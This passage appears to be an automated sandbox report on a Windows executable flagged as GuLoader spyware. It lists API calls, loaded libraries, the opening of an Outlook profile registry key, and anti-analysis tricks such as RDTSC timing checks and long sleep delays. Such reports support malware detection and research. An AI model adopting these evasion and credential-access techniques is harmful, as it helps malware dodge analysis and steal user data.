            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3A9325304_2_3A932530
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: String function: 00402BBF appears 51 times
            Source: JOSXXL1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/7@6/5
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004033B6
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E2
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile created: C:\Users\user\AppData\Local\indvandringsJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeMutant created: NULL
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile created: C:\Users\user\AppData\Local\Temp\nsxA531.tmpJump to behavior
            Source: JOSXXL1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: JOSXXL1.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile read: C:\Users\user\Desktop\JOSXXL1.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: JOSXXL1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.2321723084.000000000890B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_3_0019CA98 pushfd ; retf 0019h4_3_0019CA99
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_3_0019EE18 push eax; iretd 4_3_0019EE65
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_3_0019EE8C push eax; iretd 4_3_0019EEA9
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_3_0019CF4C push eax; iretd 4_3_0019CF4D
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_00159C30 push esp; retf 0017h4_2_00159D55
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile created: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\JOSXXL1.exeAPI/Special instruction interceptor: Address: 91911FA
            Source: C:\Users\user\Desktop\JOSXXL1.exeAPI/Special instruction interceptor: Address: 49011FA
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\JOSXXL1.exeRDTSC instruction interceptor: First address: 9155A4B second address: 9155A4B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4434F42160h 0x00000008 test cl, 00000015h 0x0000000b inc ebp 0x0000000c test ah, ch 0x0000000e inc ebx 0x0000000f test ch, 00000077h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\JOSXXL1.exeRDTSC instruction interceptor: First address: 48C5A4B second address: 48C5A4B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4434B962A0h 0x00000008 test cl, 00000015h 0x0000000b inc ebp 0x0000000c test ah, ch 0x0000000e inc ebx 0x0000000f test ch, 00000077h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\JOSXXL1.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeMemory allocated: 37450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeMemory allocated: 39450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599782Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 598913Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 598229Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597191Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596938Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596813Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596688Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596579Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596329Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596204Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595824Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595477Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595355Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595247Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595117Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594891Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594766Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594657Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594532Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594407Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594297Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594188Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594063Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593938Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593813Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593688Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593578Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593469Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593344Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeWindow / User API: threadDelayed 1665Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeWindow / User API: threadDelayed 8156Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\JOSXXL1.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -36893488147419080s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6624Thread sleep count: 1665 > 30Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6624Thread sleep count: 8156 > 30Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -599782s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -599422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -598913s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -598688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -598360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -598229s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -598110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -597860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -597191s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -597063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -596938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -596813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -596688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -596579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -596454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -596329s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -596204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -595969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -595824s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -595477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -595355s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -595247s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -595117s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -595000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -594891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -594766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -594657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -594532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -594407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -594297s >= -30000sJump to behavior
